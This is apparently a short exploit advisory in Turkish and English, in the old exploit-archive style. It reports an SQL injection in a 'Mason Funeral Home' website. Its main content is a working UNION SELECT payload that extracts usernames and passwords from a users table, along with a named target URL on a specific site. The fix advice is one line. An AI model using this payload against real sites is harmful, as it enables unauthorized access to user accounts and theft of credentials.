< ------------------- header data start ------------------- >
#############################################################
# Name : Mason Funeral Home
# Vulnerable Type : Sql Injection
# Infection : Kullanici Bilgileri Alinabilir.
# Bug Fix Advice : Zararli karakterler filtrelenmelidir.
# author : Kaiser Chief
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
+union+select+0,1,concat(user_name,0x3a,user_password),3,4,5,6+from+users
Örnek Website :
http://www.masonfuneral.com/display.php?id=
< -- bug code end of -- >